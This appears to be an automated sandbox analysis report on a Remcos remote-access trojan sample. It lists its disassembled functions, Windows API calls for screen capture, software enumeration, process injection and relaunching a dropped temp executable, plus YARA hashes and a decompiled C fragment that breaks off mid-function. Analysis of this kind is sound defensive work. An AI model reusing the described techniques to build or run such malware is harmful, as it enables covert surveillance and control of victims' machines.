                                                                                0x0040fab7
                                                                                0x0040fae2
                                                                                0x0040fb08
                                                                                0x0040fb0b
                                                                                0x0040fb12
                                                                                0x0040fb40
                                                                                0x0040fb6d
                                                                                0x0040fb72
                                                                                0x0040fb79
                                                                                0x0040fb82
                                                                                0x0040fbb0
                                                                                0x0040fbb5
                                                                                0x0040fbbf
                                                                                0x0040fbc5
                                                                                0x0040fbc5
                                                                                0x0040fb82
                                                                                0x0040fbca
                                                                                0x0040fbcd
                                                                                0x0040fbda
                                                                                0x0040fbfe
                                                                                0x0040fc02
                                                                                0x0040fc06
                                                                                0x0040fc12
                                                                                0x0040fc16
                                                                                0x0040fc22
                                                                                0x0040fc26
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040fc2a
                                                                                0x0040fc2e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040fc33
                                                                                0x0040fcc4
                                                                                0x0040fccb
                                                                                0x0040fcd7
                                                                                0x0040fc3e
                                                                                0x0040fc46
                                                                                0x0040fc48
                                                                                0x0040fc4f
                                                                                0x0040fc58
                                                                                0x0040fc5e
                                                                                0x0040fc65
                                                                                0x0040fc6d
                                                                                0x0040fc71
                                                                                0x0040fc75
                                                                                0x0040fc78
                                                                                0x0040fc78
                                                                                0x0040fc83
                                                                                0x0040fc84
                                                                                0x0040fc8b
                                                                                0x0040fc8e
                                                                                0x0040fc94
                                                                                0x0040fc9a
                                                                                0x0040fc9d
                                                                                0x0040fca5
                                                                                0x0040fca8
                                                                                0x0040fcf4
                                                                                0x0040fd2b
                                                                                0x0040fd3c
                                                                                0x0040fd40
                                                                                0x0040fd48
                                                                                0x0040fd57
                                                                                0x0040fd5e
                                                                                0x0040fd6b
                                                                                0x0040fd7a
                                                                                0x0040fd87
                                                                                0x0040fd93
                                                                                0x0040fda0
                                                                                0x0040fdaf
                                                                                0x0040fdbc
                                                                                0x0040fdc5
                                                                                0x0040fdca
                                                                                0x0040fdd9
                                                                                0x0040fdde
                                                                                0x0040fde7
                                                                                0x0040fdf0
                                                                                0x0040fdf9
                                                                                0x00000000
                                                                                0x0040fdf9
                                                                                0x0040fcff
                                                                                0x0040fd04
                                                                                0x0040fd09
                                                                                0x0040fd0e
                                                                                0x0040fd14
                                                                                0x0040fcaa
                                                                                0x0040fcb3
                                                                                0x0040fcb8
                                                                                0x0040fcbd
                                                                                0x0040fcbf
                                                                                0x0040fcbf
                                                                                0x00000000
                                                                                0x0040fca8
                                                                                0x0040fc39
                                                                                0x0040fc3c
                                                                                0x00000000
                                                                                0x0040fc3c
                                                                                0x0040fc18
                                                                                0x0040fc18
                                                                                0x00000000
                                                                                0x0040fc18
                                                                                0x0040fc08
                                                                                0x00000000
                                                                                0x0040fbdc
                                                                                0x0040fbe5
                                                                                0x0040fbea
                                                                                0x0040fbef
                                                                                0x0040fbf1
                                                                                0x00000000
                                                                                0x0040fbf1
                                                                                0x0040fbda
                                                                                0x0040fb4b
                                                                                0x0040fb50
                                                                                0x0040fb55
                                                                                0x0040fb5b
                                                                                0x00000000
                                                                                0x0040fb5b
                                                                                0x0040faeb
                                                                                0x0040faf0
                                                                                0x0040faf5
                                                                                0x0040fafb
                                                                                0x00000000
                                                                                0x0040fafb
                                                                                0x0040fac0
                                                                                0x0040fac5
                                                                                0x0040fac8
                                                                                0x0040face
                                                                                0x00000000
                                                                                0x0040fa9f
                                                                                0x0040fa9f
                                                                                0x0040fd17
                                                                                0x0040fd20
                                                                                0x0040fdff
                                                                                0x0040fe06
                                                                                0x0040fe06

                                                                                APIs
                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0040FAAC
                                                                                • DeleteDC.GDI32(00000000), ref: 0040FAC0
                                                                                • DeleteDC.GDI32(00000000), ref: 0040FAC5
                                                                                • DeleteObject.GDI32(00000000), ref: 0040FAC8
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0040FADA
                                                                                • DeleteDC.GDI32(00000000), ref: 0040FAEB
                                                                                • DeleteDC.GDI32(00000000), ref: 0040FAF0
                                                                                • DeleteObject.GDI32(00410983), ref: 0040FAF5
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FD5E
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FD6B
                                                                                • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00004D42,0000000E), ref: 0040FD7A
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FD87
                                                                                • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00000000,00000028), ref: 0040FD93
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FDA0
                                                                                • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,?), ref: 0040FDAF
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FDBC
                                                                                • DeleteObject.GDI32(00410983), ref: 0040FDC5
                                                                                • GlobalFree.KERNEL32 ref: 0040FDCA
                                                                                • DeleteDC.GDI32(00000000), ref: 0040FDD9
                                                                                • DeleteDC.GDI32(00000000), ref: 0040FDDE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040FDE7
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FDF0
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FDF9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$Delete$??0?$basic_string@ObjectV01@@$?assign@?$basic_string@CreateD@1@@V01@V12@Y?$basic_string@$??1?$basic_string@Compatible$BitmapFreeGlobalSelect
                                                                                • String ID: $BM$DISPLAY
                                                                                • API String ID: 1151051811-871886180
                                                                                • Opcode ID: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                                                                • Instruction ID: 6bc9ab2a81804b36ace2e86e9fd4fad5708e5c5067481f6dd5077a8177631ab2
                                                                                • Opcode Fuzzy Hash: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                                                                • Instruction Fuzzy Hash: 17C1E37190020DEFDF209FA0DC849DEBBB9FF48314F10843AE915A62A0D735AA59DF54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004130BF, Relevance: 86.0, APIs: 42, Strings: 7, Instructions: 239registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 004130DF
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 004130F5
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00413116
                                                                                • RegEnumKeyExA.ADVAPI32 ref: 00413135
                                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00413160
                                                                                • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 004131DD
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,?,00416AFC,0041623C), ref: 0041321D
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00416AFC,0041623C), ref: 0041322D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??0?$basic_string@G@1@@G@2@@0@Hstd@@OpenV?$basic_string@$?empty@?$basic_string@EnumV10@V10@0@
                                                                                • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                • API String ID: 1820998543-3714951968
                                                                                • Opcode ID: 216b46f8e007e87f0a84d038c9d0dd50959d9b889a890c0fee36900767b7dc02
                                                                                • Instruction ID: 27b32b71c815465ffb7daa5c7642a7d313003b3f6ade3c30451be995a5edf32b
                                                                                • Opcode Fuzzy Hash: 216b46f8e007e87f0a84d038c9d0dd50959d9b889a890c0fee36900767b7dc02
                                                                                • Instruction Fuzzy Hash: D791F87280011DEBCB10EB91DD49EEEBB7CEF54304F1444A6B506A3051EB759B88CFA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00409A2F, Relevance: 80.7, APIs: 42, Strings: 4, Instructions: 228processsynchronizationCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,0041BCB0,00000000), ref: 00409A49
                                                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,004166B4,?,0041BCB0,00000000), ref: 00409A5E
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?,00000000), ref: 00409A77
                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00409A81
                                                                                • Process32FirstW.KERNEL32(?,?), ref: 00409A9D
                                                                                • Process32NextW.KERNEL32(?,0000022C), ref: 00409AAC
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00000002,00000000), ref: 00409ACC
                                                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60 ref: 00409ADB
                                                                                • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AE5
                                                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(00000000), ref: 00409AEF
                                                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@0@Z.MSVCP60(?,?,00000000), ref: 00409B03
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B13
                                                                                • Process32NextW.KERNEL32(?,0000022C), ref: 00409B23
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00409B3F
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B48
                                                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,?), ref: 00409B59
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B64
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B6D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409B76
                                                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,00415800), ref: 00409B88
                                                                                • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@ABV12@@Z.MSVCP60(?), ref: 00409BAF
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BB8
                                                                                • CloseHandle.KERNEL32(?,00000002,00000000), ref: 00409BC1
                                                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(?,00415800), ref: 00409BC8
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BD7
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 00409BEB
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409BF4
                                                                                • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(Program Files\,00000000), ref: 00409C0E
                                                                                • wcslen.MSVCRT ref: 00409C25
                                                                                • ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000), ref: 00409C31
                                                                                • ??8std@@YA_NPBGABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@@Z.MSVCP60(?,?), ref: 00409C42
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409C58
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409C66
                                                                                • CreateMutexA.KERNEL32(00000000,00000001,Remcos_Mutex_Inj), ref: 00409C75
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00409C84
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00409C93
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00409CA4
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00409CAE
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,00000001), ref: 00409CCC
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00409CE5
                                                                                  • Part of subcall function 00412B15: OpenProcess.KERNEL32(00000400,00000000,?,?,00409B9F,?), ref: 00412B2B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409CEC
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00409CF5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$??8std@@V?$basic_string@$?c_str@?$basic_string@D@2@@std@@D@std@@G@2@@0@$??0?$basic_string@Process32$??4?$basic_string@?begin@?$basic_string@CloseCreateG@1@@HandleNextV01@V01@@V12@$?assign@?$basic_string@?end@?$basic_string@?find@?$basic_string@?replace@?$basic_string@D@1@@FileFirstG@2@@0@0@G@2@@0@@ModuleMutexNameOpenProcessSnapshotToolhelp32V12@@wcslen
                                                                                • String ID: Inj$Program Files (x86)\$Program Files\$Remcos_Mutex_Inj
                                                                                • API String ID: 2459104678-694575909
                                                                                • Opcode ID: 8084943976f618cdb9b7c4a87dcffa8e72a97da1b1abb2ee8dfe9f65ccaf5f7c
                                                                                • Instruction ID: 7a0e813b4e10dd3dd77c68d554191e2bbc423507f4273ca30df3ab345c5067a4
                                                                                • Opcode Fuzzy Hash: 8084943976f618cdb9b7c4a87dcffa8e72a97da1b1abb2ee8dfe9f65ccaf5f7c
                                                                                • Instruction Fuzzy Hash: 2D811E7280450DEBCF04AFA0EC499EE7B78EF48355F14407AF906A70A1DB755A8ACF58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040A906, Relevance: 77.3, APIs: 39, Strings: 5, Instructions: 271sleepsynchronizationstringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateMutexA.KERNEL32(00000000,00000001,0041BA38,0041BCB0,00000000), ref: 0040A91D
                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040A930
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040A93D
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040A946
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,?,00000208,00000000), ref: 0040A965
                                                                                  • Part of subcall function 0040B692: RegOpenKeyExA.KERNELBASE(80000001,0040936A,00000000,00020019,0040936A), ref: 0040B6AC
                                                                                  • Part of subcall function 0040B692: RegQueryValueExA.KERNELBASE(0040936A,?,00000000,00000000,?,?,0041BCC0), ref: 0040B6C8
                                                                                  • Part of subcall function 0040B692: RegCloseKey.KERNELBASE(0040936A), ref: 0040B6D3
                                                                                • exit.MSVCRT ref: 0040A97F
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040A98C
                                                                                • exit.MSVCRT ref: 0040A9A9
                                                                                • OpenProcess.KERNEL32(00100000,00000000,80000001), ref: 0040A9B8
                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040A9C4
                                                                                • CloseHandle.KERNEL32(80000001), ref: 0040A9CD
                                                                                • GetCurrentProcessId.KERNEL32 ref: 0040A9D3
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(WDH,00000000), ref: 0040A9E1
                                                                                • PathFileExistsW.SHLWAPI(?), ref: 0040AA00
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 0040AA15
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AA1F
                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 0040AA63
                                                                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0040AA7E
                                                                                • lstrcatW.KERNEL32(?,.exe), ref: 0040AA90
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000), ref: 0040AAA2
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AAAC
                                                                                  • Part of subcall function 00412D56: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                                                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0040AAD2
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,80000001), ref: 0040AAE4
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524), ref: 0040AAFE
                                                                                • Sleep.KERNEL32(000001F4), ref: 0040AB15
                                                                                • exit.MSVCRT ref: 0040AB2A
                                                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800,00000000,80000001,0041BA38), ref: 0040AB4C
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040AB78
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AB81
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000,00000410,00000000), ref: 0040AB9E
                                                                                • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(?), ref: 0040ABC2
                                                                                • ??8std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BA28,00415800), ref: 0040ABD2
                                                                                • Sleep.KERNEL32(00000BB8), ref: 0040ABF9
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040AC0D
                                                                                  • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,0041BA5C,0041BA28,00415A24,?,00408003), ref: 00407D7A
                                                                                  • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24,?,00408003), ref: 00407D84
                                                                                  • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,0041BA5C), ref: 00407DA4
                                                                                  • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,00415628,0041BA28,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407DBE
                                                                                  • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407DC8
                                                                                  • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,0041BA5C), ref: 00407DE8
                                                                                  • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000001,00415628,0041BA28,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407E02
                                                                                  • Part of subcall function 00407D53: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 00407E0C
                                                                                  • Part of subcall function 00407D53: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00415628,00000001,0041BA5C), ref: 00407E2C
                                                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003), ref: 0040AC32
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040AC3B
                                                                                • ?size@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040AC44
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 0040AC51
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(exepath,00000000), ref: 0040AC62
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@std@@$?c_str@?$basic_string@$G@2@@0@V?$basic_string@$G@2@@std@@$?size@?$basic_string@Hstd@@$File$??1?$basic_string@V10@V10@@exit$??8std@@CloseCreateNameOpenPathProcessSleepTemp$??0?$basic_string@??4?$basic_string@CurrentD@1@@ExecuteExistsHandleModuleMutexObjectQueryShellSingleV01@ValueWaitlstrcat
                                                                                • String ID: .exe$WDH$exepath$open$temp_
                                                                                • API String ID: 2802067201-3088914985
                                                                                • Opcode ID: 91a4b90af5407b5c611c4e811b9554bfa2c18ac8904ed8204e6ccb714b4e2a2b
                                                                                • Instruction ID: 71612b700bd92f7f916ca3283b0c55b6d5dde9a5cbb5d2c431e2c067e6a7b7c7
                                                                                • Opcode Fuzzy Hash: 91a4b90af5407b5c611c4e811b9554bfa2c18ac8904ed8204e6ccb714b4e2a2b
                                                                                • Instruction Fuzzy Hash: E5919772640608BBDB115BA0DC49FEF376DEB88341F10407AFA06E61D1DBB84995CBAD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00411D8A, Relevance: 77.2, APIs: 34, Strings: 10, Instructions: 210synchronizationCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 25%
                                                                                			E00411D8A(WCHAR* __eax, char _a4, intOrPtr _a20, intOrPtr _a24, char _a27) {
				char _v20;
				char _v36;
				char _v52;
				char _v68;
				char _v84;
				char _v88;
				char* _t35;
				char* _t36;
				char* _t37;
				WCHAR* _t38;
				void* _t43;
				void* _t47;
				intOrPtr* _t50;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t86;
				intOrPtr _t87;
				intOrPtr* _t88;
				void* _t91;

				_t30 = __eax;
				__imp__?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z(0x5c, 0);
				if(__eax ==  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t30 = E004135DE();
					_t91 = _t91 + 0xc;
					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t30,  &_v36, 0x30, __eax);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				if(_t30 <= 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					if(PathFileExistsW(_t30) != 0) {
						goto L4;
					} else {
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
						_t47 = E004020C2(0x41c178, 0xa8, 0x415664);
					}
				} else {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(_a24, _t30);
					E00412E4E(_t30);
					_t91 = _t91 - 0x10 + 0x14;
					L4:
					_t35 =  &_v68;
					L0041416A();
					_t36 =  &_v52;
					L00414146();
					_t37 =  &_v36;
					L0041414C();
					_t38 =  &_v20;
					L00414146();
